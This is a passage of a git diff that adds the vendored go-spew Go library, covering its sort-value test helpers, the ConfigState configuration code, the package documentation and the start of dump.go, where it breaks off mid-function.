+func (s *pstringer) String() string {
+	return "stringer " + string(*s)
+}
+
+// xref1 and xref2 are cross referencing structs for testing circular reference
+// detection.
+type xref1 struct {
+	ps2 *xref2
+}
+type xref2 struct {
+	ps1 *xref1
+}
+
+// indirCir1, indirCir2, and indirCir3 are used to generate an indirect circular
+// reference for testing detection.
+type indirCir1 struct {
+	ps2 *indirCir2
+}
+type indirCir2 struct {
+	ps3 *indirCir3
+}
+type indirCir3 struct {
+	ps1 *indirCir1
+}
+
+// embed is used to test embedded structures.
+type embed struct {
+	a string
+}
+
+// embedwrap is used to test embedded structures.
+type embedwrap struct {
+	*embed
+	e *embed
+}
+
+// panicer is used to intentionally cause a panic for testing spew properly
+// handles them
+type panicer int
+
+func (p panicer) String() string {
+	panic("test panic")
+}
+
+// customError is used to test custom error interface invocation.
+type customError int
+
+func (e customError) Error() string {
+	return fmt.Sprintf("error: %d", int(e))
+}
+
+// stringizeWants converts a slice of wanted test output into a format suitable
+// for a test error message.
+func stringizeWants(wants []string) string {
+	s := ""
+	for i, want := range wants {
+		if i > 0 {
+			s += fmt.Sprintf("want%d: %s", i+1, want)
+		} else {
+			s += "want: " + want
+		}
+	}
+	return s
+}
+
+// testFailed returns whether or not a test failed by checking if the result
+// of the test is in the slice of wanted strings.
+func testFailed(result string, wants []string) bool {
+	for _, want := range wants {
+		if result == want {
+			return false
+		}
+	}
+	return true
+}
+
+type sortableStruct struct {
+	x int
+}
+
+func (ss sortableStruct) String() string {
+	return fmt.Sprintf("ss.%d", ss.x)
+}
+
+type unsortableStruct struct {
+	x int
+}
+
+type sortTestCase struct {
+	input    []reflect.Value
+	expected []reflect.Value
+}
+
+func helpTestSortValues(tests []sortTestCase, cs *spew.ConfigState, t *testing.T) {
+	getInterfaces := func(values []reflect.Value) []interface{} {
+		interfaces := []interface{}{}
+		for _, v := range values {
+			interfaces = append(interfaces, v.Interface())
+		}
+		return interfaces
+	}
+
+	for _, test := range tests {
+		spew.SortValues(test.input, cs)
+		// reflect.DeepEqual cannot really make sense of reflect.Value,
+		// probably because of all the pointer tricks. For instance,
+		// v(2.0) != v(2.0) on a 32-bits system. Turn them into interface{}
+		// instead.
+		input := getInterfaces(test.input)
+		expected := getInterfaces(test.expected)
+		if !reflect.DeepEqual(input, expected) {
+			t.Errorf("Sort mismatch:\n %v != %v", input, expected)
+		}
+	}
+}
+
+// TestSortValues ensures the sort functionality for relect.Value based sorting
+// works as intended.
+func TestSortValues(t *testing.T) {
+	v := reflect.ValueOf
+
+	a := v("a")
+	b := v("b")
+	c := v("c")
+	embedA := v(embed{"a"})
+	embedB := v(embed{"b"})
+	embedC := v(embed{"c"})
+	tests := []sortTestCase{
+		// No values.
+		{
+			[]reflect.Value{},
+			[]reflect.Value{},
+		},
+		// Bools.
+		{
+			[]reflect.Value{v(false), v(true), v(false)},
+			[]reflect.Value{v(false), v(false), v(true)},
+		},
+		// Ints.
+		{
+			[]reflect.Value{v(2), v(1), v(3)},
+			[]reflect.Value{v(1), v(2), v(3)},
+		},
+		// Uints.
+		{
+			[]reflect.Value{v(uint8(2)), v(uint8(1)), v(uint8(3))},
+			[]reflect.Value{v(uint8(1)), v(uint8(2)), v(uint8(3))},
+		},
+		// Floats.
+		{
+			[]reflect.Value{v(2.0), v(1.0), v(3.0)},
+			[]reflect.Value{v(1.0), v(2.0), v(3.0)},
+		},
+		// Strings.
+		{
+			[]reflect.Value{b, a, c},
+			[]reflect.Value{a, b, c},
+		},
+		// Array
+		{
+			[]reflect.Value{v([3]int{3, 2, 1}), v([3]int{1, 3, 2}), v([3]int{1, 2, 3})},
+			[]reflect.Value{v([3]int{1, 2, 3}), v([3]int{1, 3, 2}), v([3]int{3, 2, 1})},
+		},
+		// Uintptrs.
+		{
+			[]reflect.Value{v(uintptr(2)), v(uintptr(1)), v(uintptr(3))},
+			[]reflect.Value{v(uintptr(1)), v(uintptr(2)), v(uintptr(3))},
+		},
+		// SortableStructs.
+		{
+			// Note: not sorted - DisableMethods is set.
+			[]reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+			[]reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+		},
+		// UnsortableStructs.
+		{
+			// Note: not sorted - SpewKeys is false.
+			[]reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+			[]reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+		},
+		// Invalid.
+		{
+			[]reflect.Value{embedB, embedA, embedC},
+			[]reflect.Value{embedB, embedA, embedC},
+		},
+	}
+	cs := spew.ConfigState{DisableMethods: true, SpewKeys: false}
+	helpTestSortValues(tests, &cs, t)
+}
+
+// TestSortValuesWithMethods ensures the sort functionality for relect.Value
+// based sorting works as intended when using string methods.
+func TestSortValuesWithMethods(t *testing.T) {
+	v := reflect.ValueOf
+
+	a := v("a")
+	b := v("b")
+	c := v("c")
+	tests := []sortTestCase{
+		// Ints.
+		{
+			[]reflect.Value{v(2), v(1), v(3)},
+			[]reflect.Value{v(1), v(2), v(3)},
+		},
+		// Strings.
+		{
+			[]reflect.Value{b, a, c},
+			[]reflect.Value{a, b, c},
+		},
+		// SortableStructs.
+		{
+			[]reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+			[]reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})},
+		},
+		// UnsortableStructs.
+		{
+			// Note: not sorted - SpewKeys is false.
+			[]reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+			[]reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+		},
+	}
+	cs := spew.ConfigState{DisableMethods: false, SpewKeys: false}
+	helpTestSortValues(tests, &cs, t)
+}
+
+// TestSortValuesWithSpew ensures the sort functionality for relect.Value
+// based sorting works as intended when using spew to stringify keys.
+func TestSortValuesWithSpew(t *testing.T) {
+	v := reflect.ValueOf
+
+	a := v("a")
+	b := v("b")
+	c := v("c")
+	tests := []sortTestCase{
+		// Ints.
+		{
+			[]reflect.Value{v(2), v(1), v(3)},
+			[]reflect.Value{v(1), v(2), v(3)},
+		},
+		// Strings.
+		{
+			[]reflect.Value{b, a, c},
+			[]reflect.Value{a, b, c},
+		},
+		// SortableStructs.
+		{
+			[]reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+			[]reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})},
+		},
+		// UnsortableStructs.
+		{
+			[]reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+			[]reflect.Value{v(unsortableStruct{1}), v(unsortableStruct{2}), v(unsortableStruct{3})},
+		},
+	}
+	cs := spew.ConfigState{DisableMethods: true, SpewKeys: true}
+	helpTestSortValues(tests, &cs, t)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/config.go b/vendor/github.com/davecgh/go-spew/spew/config.go
new file mode 100644
index 0000000000..2e3d22f312
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/config.go
@@ -0,0 +1,306 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"os"
+)
+
+// ConfigState houses the configuration options used by spew to format and
+// display values.  There is a global instance, Config, that is used to control
+// all top-level Formatter and Dump functionality.  Each ConfigState instance
+// provides methods equivalent to the top-level functions.
+//
+// The zero value for ConfigState provides no indentation.  You would typically
+// want to set it to a space or a tab.
+//
+// Alternatively, you can use NewDefaultConfig to get a ConfigState instance
+// with default settings.  See the documentation of NewDefaultConfig for default
+// values.
+type ConfigState struct {
+	// Indent specifies the string to use for each indentation level.  The
+	// global config instance that all top-level functions use set this to a
+	// single space by default.  If you would like more indentation, you might
+	// set this to a tab with "\t" or perhaps two spaces with "  ".
+	Indent string
+
+	// MaxDepth controls the maximum number of levels to descend into nested
+	// data structures.  The default, 0, means there is no limit.
+	//
+	// NOTE: Circular data structures are properly detected, so it is not
+	// necessary to set this value unless you specifically want to limit deeply
+	// nested data structures.
+	MaxDepth int
+
+	// DisableMethods specifies whether or not error and Stringer interfaces are
+	// invoked for types that implement them.
+	DisableMethods bool
+
+	// DisablePointerMethods specifies whether or not to check for and invoke
+	// error and Stringer interfaces on types which only accept a pointer
+	// receiver when the current type is not a pointer.
+	//
+	// NOTE: This might be an unsafe action since calling one of these methods
+	// with a pointer receiver could technically mutate the value, however,
+	// in practice, types which choose to satisify an error or Stringer
+	// interface with a pointer receiver should not be mutating their state
+	// inside these interface methods.  As a result, this option relies on
+	// access to the unsafe package, so it will not have any effect when
+	// running in environments without access to the unsafe package such as
+	// Google App Engine or with the "safe" build tag specified.
+	DisablePointerMethods bool
+
+	// DisablePointerAddresses specifies whether to disable the printing of
+	// pointer addresses. This is useful when diffing data structures in tests.
+	DisablePointerAddresses bool
+
+	// DisableCapacities specifies whether to disable the printing of capacities
+	// for arrays, slices, maps and channels. This is useful when diffing
+	// data structures in tests.
+	DisableCapacities bool
+
+	// ContinueOnMethod specifies whether or not recursion should continue once
+	// a custom error or Stringer interface is invoked.  The default, false,
+	// means it will print the results of invoking the custom error or Stringer
+	// interface and return immediately instead of continuing to recurse into
+	// the internals of the data type.
+	//
+	// NOTE: This flag does not have any effect if method invocation is disabled
+	// via the DisableMethods or DisablePointerMethods options.
+	ContinueOnMethod bool
+
+	// SortKeys specifies map keys should be sorted before being printed. Use
+	// this to have a more deterministic, diffable output.  Note that only
+	// native types (bool, int, uint, floats, uintptr and string) and types
+	// that support the error or Stringer interfaces (if methods are
+	// enabled) are supported, with other types sorted according to the
+	// reflect.Value.String() output which guarantees display stability.
+	SortKeys bool
+
+	// SpewKeys specifies that, as a last resort attempt, map keys should
+	// be spewed to strings and sorted by those strings.  This is only
+	// considered if SortKeys is true.
+	SpewKeys bool
+}
+
+// Config is the active configuration of the top-level functions.
+// The configuration can be changed by modifying the contents of spew.Config.
+var Config = ConfigState{Indent: " "}
+
+// Errorf is a wrapper for fmt.Errorf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter.  It returns
+// the formatted string as a value that satisfies error.  See NewFormatter
+// for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Errorf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Errorf(format string, a ...interface{}) (err error) {
+	return fmt.Errorf(format, c.convertArgs(a)...)
+}
+
+// Fprint is a wrapper for fmt.Fprint that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter.  It returns
+// the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Fprint(w, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprint(w io.Writer, a ...interface{}) (n int, err error) {
+	return fmt.Fprint(w, c.convertArgs(a)...)
+}
+
+// Fprintf is a wrapper for fmt.Fprintf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter.  It returns
+// the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Fprintf(w, format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprintf(w io.Writer, format string, a ...interface{}) (n int, err error) {
+	return fmt.Fprintf(w, format, c.convertArgs(a)...)
+}
+
+// Fprintln is a wrapper for fmt.Fprintln that treats each argument as if it
+// passed with a Formatter interface returned by c.NewFormatter.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Fprintln(w, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprintln(w io.Writer, a ...interface{}) (n int, err error) {
+	return fmt.Fprintln(w, c.convertArgs(a)...)
+}
+
+// Print is a wrapper for fmt.Print that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter.  It returns
+// the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Print(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Print(a ...interface{}) (n int, err error) {
+	return fmt.Print(c.convertArgs(a)...)
+}
+
+// Printf is a wrapper for fmt.Printf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter.  It returns
+// the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Printf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Printf(format string, a ...interface{}) (n int, err error) {
+	return fmt.Printf(format, c.convertArgs(a)...)
+}
+
+// Println is a wrapper for fmt.Println that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter.  It returns
+// the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Println(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Println(a ...interface{}) (n int, err error) {
+	return fmt.Println(c.convertArgs(a)...)
+}
+
+// Sprint is a wrapper for fmt.Sprint that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter.  It returns
+// the resulting string.  See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Sprint(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprint(a ...interface{}) string {
+	return fmt.Sprint(c.convertArgs(a)...)
+}
+
+// Sprintf is a wrapper for fmt.Sprintf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter.  It returns
+// the resulting string.  See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Sprintf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprintf(format string, a ...interface{}) string {
+	return fmt.Sprintf(format, c.convertArgs(a)...)
+}
+
+// Sprintln is a wrapper for fmt.Sprintln that treats each argument as if it
+// were passed with a Formatter interface returned by c.NewFormatter.  It
+// returns the resulting string.  See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Sprintln(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprintln(a ...interface{}) string {
+	return fmt.Sprintln(c.convertArgs(a)...)
+}
+
+/*
+NewFormatter returns a custom formatter that satisfies the fmt.Formatter
+interface.  As a result, it integrates cleanly with standard fmt package
+printing functions.  The formatter is useful for inline printing of smaller data
+types similar to the standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), and %#+v (adds types and pointer addresses) verb
+combinations.  Any other verbs such as %x and %q will be sent to the the
+standard fmt package for formatting.  In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Typically this function shouldn't be called directly.  It is much easier to make
+use of the custom formatter by calling one of the convenience functions such as
+c.Printf, c.Println, or c.Printf.
+*/
+func (c *ConfigState) NewFormatter(v interface{}) fmt.Formatter {
+	return newFormatter(c, v)
+}
+
+// Fdump formats and displays the passed arguments to io.Writer w.  It formats
+// exactly the same as Dump.
+func (c *ConfigState) Fdump(w io.Writer, a ...interface{}) {
+	fdump(c, w, a...)
+}
+
+/*
+Dump displays the passed parameters to standard out with newlines, customizable
+indentation, and additional debug information such as complete types and all
+pointer addresses used to indirect to the final value.  It provides the
+following features over the built-in printing facilities provided by the fmt
+package:
+
+	* Pointers are dereferenced and followed
+	* Circular data structures are detected and handled properly
+	* Custom Stringer/error interfaces are optionally invoked, including
+	  on unexported types
+	* Custom types which only implement the Stringer/error interfaces via
+	  a pointer receiver are optionally invoked when passing non-pointer
+	  variables
+	* Byte arrays and slices are dumped like the hexdump -C command which
+	  includes offsets, byte values in hex, and ASCII output
+
+The configuration options are controlled by modifying the public members
+of c.  See ConfigState for options documentation.
+
+See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to
+get the formatted result as a string.
+*/
+func (c *ConfigState) Dump(a ...interface{}) {
+	fdump(c, os.Stdout, a...)
+}
+
+// Sdump returns a string with the passed arguments formatted exactly the same
+// as Dump.
+func (c *ConfigState) Sdump(a ...interface{}) string {
+	var buf bytes.Buffer
+	fdump(c, &buf, a...)
+	return buf.String()
+}
+
+// convertArgs accepts a slice of arguments and returns a slice of the same
+// length with each argument converted to a spew Formatter interface using
+// the ConfigState associated with s.
+func (c *ConfigState) convertArgs(args []interface{}) (formatters []interface{}) {
+	formatters = make([]interface{}, len(args))
+	for index, arg := range args {
+		formatters[index] = newFormatter(c, arg)
+	}
+	return formatters
+}
+
+// NewDefaultConfig returns a ConfigState with the following default settings.
+//
+// 	Indent: " "
+// 	MaxDepth: 0
+// 	DisableMethods: false
+// 	DisablePointerMethods: false
+// 	ContinueOnMethod: false
+// 	SortKeys: false
+func NewDefaultConfig() *ConfigState {
+	return &ConfigState{Indent: " "}
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/doc.go b/vendor/github.com/davecgh/go-spew/spew/doc.go
new file mode 100644
index 0000000000..aacaac6f1e
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/doc.go
@@ -0,0 +1,211 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Package spew implements a deep pretty printer for Go data structures to aid in
+debugging.
+
+A quick overview of the additional features spew provides over the built-in
+printing facilities for Go data types are as follows:
+
+	* Pointers are dereferenced and followed
+	* Circular data structures are detected and handled properly
+	* Custom Stringer/error interfaces are optionally invoked, including
+	  on unexported types
+	* Custom types which only implement the Stringer/error interfaces via
+	  a pointer receiver are optionally invoked when passing non-pointer
+	  variables
+	* Byte arrays and slices are dumped like the hexdump -C command which
+	  includes offsets, byte values in hex, and ASCII output (only when using
+	  Dump style)
+
+There are two different approaches spew allows for dumping Go data structures:
+
+	* Dump style which prints with newlines, customizable indentation,
+	  and additional debug information such as types and all pointer addresses
+	  used to indirect to the final value
+	* A custom Formatter interface that integrates cleanly with the standard fmt
+	  package and replaces %v, %+v, %#v, and %#+v to provide inline printing
+	  similar to the default %v while providing the additional functionality
+	  outlined above and passing unsupported format verbs such as %x and %q
+	  along to fmt
+
+Quick Start
+
+This section demonstrates how to quickly get started with spew.  See the
+sections below for further details on formatting and configuration options.
+
+To dump a variable with full newlines, indentation, type, and pointer
+information use Dump, Fdump, or Sdump:
+	spew.Dump(myVar1, myVar2, ...)
+	spew.Fdump(someWriter, myVar1, myVar2, ...)
+	str := spew.Sdump(myVar1, myVar2, ...)
+
+Alternatively, if you would prefer to use format strings with a compacted inline
+printing style, use the convenience wrappers Printf, Fprintf, etc with
+%v (most compact), %+v (adds pointer addresses), %#v (adds types), or
+%#+v (adds types and pointer addresses):
+	spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+	spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+	spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+	spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+
+Configuration Options
+
+Configuration of spew is handled by fields in the ConfigState type.  For
+convenience, all of the top-level functions use a global state available
+via the spew.Config global.
+
+It is also possible to create a ConfigState instance that provides methods
+equivalent to the top-level functions.  This allows concurrent configuration
+options.  See the ConfigState documentation for more details.
+
+The following configuration options are available:
+	* Indent
+		String to use for each indentation level for Dump functions.
+		It is a single space by default.  A popular alternative is "\t".
+
+	* MaxDepth
+		Maximum number of levels to descend into nested data structures.
+		There is no limit by default.
+
+	* DisableMethods
+		Disables invocation of error and Stringer interface methods.
+		Method invocation is enabled by default.
+
+	* DisablePointerMethods
+		Disables invocation of error and Stringer interface methods on types
+		which only accept pointer receivers from non-pointer variables.
+		Pointer method invocation is enabled by default.
+
+	* DisablePointerAddresses
+		DisablePointerAddresses specifies whether to disable the printing of
+		pointer addresses. This is useful when diffing data structures in tests.
+
+	* DisableCapacities
+		DisableCapacities specifies whether to disable the printing of
+		capacities for arrays, slices, maps and channels. This is useful when
+		diffing data structures in tests.
+
+	* ContinueOnMethod
+		Enables recursion into types after invoking error and Stringer interface
+		methods. Recursion after method invocation is disabled by default.
+
+	* SortKeys
+		Specifies map keys should be sorted before being printed. Use
+		this to have a more deterministic, diffable output.  Note that
+		only native types (bool, int, uint, floats, uintptr and string)
+		and types which implement error or Stringer interfaces are
+		supported with other types sorted according to the
+		reflect.Value.String() output which guarantees display
+		stability.  Natural map order is used by default.
+
+	* SpewKeys
+		Specifies that, as a last resort attempt, map keys should be
+		spewed to strings and sorted by those strings.  This is only
+		considered if SortKeys is true.
+
+Dump Usage
+
+Simply call spew.Dump with a list of variables you want to dump:
+
+	spew.Dump(myVar1, myVar2, ...)
+
+You may also call spew.Fdump if you would prefer to output to an arbitrary
+io.Writer.  For example, to dump to standard error:
+
+	spew.Fdump(os.Stderr, myVar1, myVar2, ...)
+
+A third option is to call spew.Sdump to get the formatted output as a string:
+
+	str := spew.Sdump(myVar1, myVar2, ...)
+
+Sample Dump Output
+
+See the Dump example for details on the setup of the types and variables being
+shown here.
+
+	(main.Foo) {
+	 unexportedField: (*main.Bar)(0xf84002e210)({
+	  flag: (main.Flag) flagTwo,
+	  data: (uintptr) <nil>
+	 }),
+	 ExportedField: (map[interface {}]interface {}) (len=1) {
+	  (string) (len=3) "one": (bool) true
+	 }
+	}
+
+Byte (and uint8) arrays and slices are displayed uniquely like the hexdump -C
+command as shown.
+	([]uint8) (len=32 cap=32) {
+	 00000000  11 12 13 14 15 16 17 18  19 1a 1b 1c 1d 1e 1f 20  |............... |
+	 00000010  21 22 23 24 25 26 27 28  29 2a 2b 2c 2d 2e 2f 30  |!"#$%&'()*+,-./0|
+	 00000020  31 32                                             |12|
+	}
+
+Custom Formatter
+
+Spew provides a custom formatter that implements the fmt.Formatter interface
+so that it integrates cleanly with standard fmt package printing functions. The
+formatter is useful for inline printing of smaller data types similar to the
+standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb
+combinations.  Any other verbs such as %x and %q will be sent to the the
+standard fmt package for formatting.  In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Custom Formatter Usage
+
+The simplest way to make use of the spew custom formatter is to call one of the
+convenience functions such as spew.Printf, spew.Println, or spew.Printf.  The
+functions have syntax you are most likely already familiar with:
+
+	spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+	spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+	spew.Println(myVar, myVar2)
+	spew.Fprintf(os.Stderr, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+	spew.Fprintf(os.Stderr, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+
+See the Index for the full list convenience functions.
+
+Sample Formatter Output
+
+Double pointer to a uint8:
+	  %v: <**>5
+	 %+v: <**>(0xf8400420d0->0xf8400420c8)5
+	 %#v: (**uint8)5
+	%#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5
+
+Pointer to circular struct with a uint8 field and a pointer to itself:
+	  %v: <*>{1 <*><shown>}
+	 %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)<shown>}
+	 %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)<shown>}
+	%#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)<shown>}
+
+See the Printf example for details on the setup of variables being shown
+here.
+
+Errors
+
+Since it is possible for custom Stringer/error interfaces to panic, spew
+detects them and handles them internally by printing the panic information
+inline with the output.  Since spew is intended to provide deep pretty printing
+capabilities on structures, it intentionally does not return any errors.
+*/
+package spew
diff --git a/vendor/github.com/davecgh/go-spew/spew/dump.go b/vendor/github.com/davecgh/go-spew/spew/dump.go
new file mode 100644
index 0000000000..df1d582a72
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dump.go
@@ -0,0 +1,509 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+	"bytes"
+	"encoding/hex"
+	"fmt"
+	"io"
+	"os"
+	"reflect"
+	"regexp"
+	"strconv"
+	"strings"
+)
+
+var (
+	// uint8Type is a reflect.Type representing a uint8.  It is used to
+	// convert cgo types to uint8 slices for hexdumping.
+	uint8Type = reflect.TypeOf(uint8(0))
+
+	// cCharRE is a regular expression that matches a cgo char.
+	// It is used to detect character arrays to hexdump them.
+	cCharRE = regexp.MustCompile("^.*\\._Ctype_char$")
+
+	// cUnsignedCharRE is a regular expression that matches a cgo unsigned
+	// char.  It is used to detect unsigned character arrays to hexdump
+	// them.
+	cUnsignedCharRE = regexp.MustCompile("^.*\\._Ctype_unsignedchar$")
+
+	// cUint8tCharRE is a regular expression that matches a cgo uint8_t.
+	// It is used to detect uint8_t arrays to hexdump them.
+	cUint8tCharRE = regexp.MustCompile("^.*\\._Ctype_uint8_t$")
+)
+
+// dumpState contains information about the state of a dump operation.
+type dumpState struct {
+	w                io.Writer
+	depth            int
+	pointers         map[uintptr]int
+	ignoreNextType   bool
+	ignoreNextIndent bool
+	cs               *ConfigState
+}
+
+// indent performs indentation according to the depth level and cs.Indent
+// option.
+func (d *dumpState) indent() {
+	if d.ignoreNextIndent {
+		d.ignoreNextIndent = false
+		return
+	}
+	d.w.Write(bytes.Repeat([]byte(d.cs.Indent), d.depth))
+}
+
+// unpackValue returns values inside of non-nil interfaces when possible.
+// This is useful for data types like structs, arrays, slices, and maps which
+// can contain varying types packed inside an interface.
+func (d *dumpState) unpackValue(v reflect.Value) reflect.Value {
+	if v.Kind() == reflect.Interface && !v.IsNil() {
+		v = v.Elem()
+	}
+	return v
+}
+
+// dumpPtr handles formatting of pointers by indirecting them as necessary.
+func (d *dumpState) dumpPtr(v reflect.Value) {
+	// Remove pointers at or below the current depth from map used to detect
+	// circular refs.
+	for k, depth := range d.pointers {
+		if depth >= d.depth {
+			delete(d.pointers, k)
+		}
+	}
+
+	// Keep list of all dereferenced pointers to show later.
+	pointerChain := make([]uintptr, 0)
+
+	// Figure out how many levels of indirection there are by dereferencing
+	// pointers and unpacking interfaces down the chain while detecting circular
+	// references.
+	nilFound := false
+	cycleFound := false
+	indirects := 0
+	ve := v
+	for ve.Kind() == reflect.Ptr {
+		if ve.IsNil() {
+			nilFound = true
+			break
+		}
+		indirects++
+		addr := ve.Pointer()
+		pointerChain = append(pointerChain, addr)
+		if pd, ok := d.pointers[addr]; ok && pd < d.depth {
+			cycleFound = true
+			indirects--
+			break
+		}
+		d.pointers[addr] = d.depth
+
+		ve = ve.Elem()
+		if ve.Kind() == reflect.Interface {
+			if ve.IsNil() {
+				nilFound = true
+				break
+			}
+			ve = ve.Elem()
+		}
+	}
+
+	// Display type information.
+	d.w.Write(openParenBytes)
+	d.w.Write(bytes.Repeat(asteriskBytes, indirects))
+	d.w.Write([]byte(ve.Type().String()))
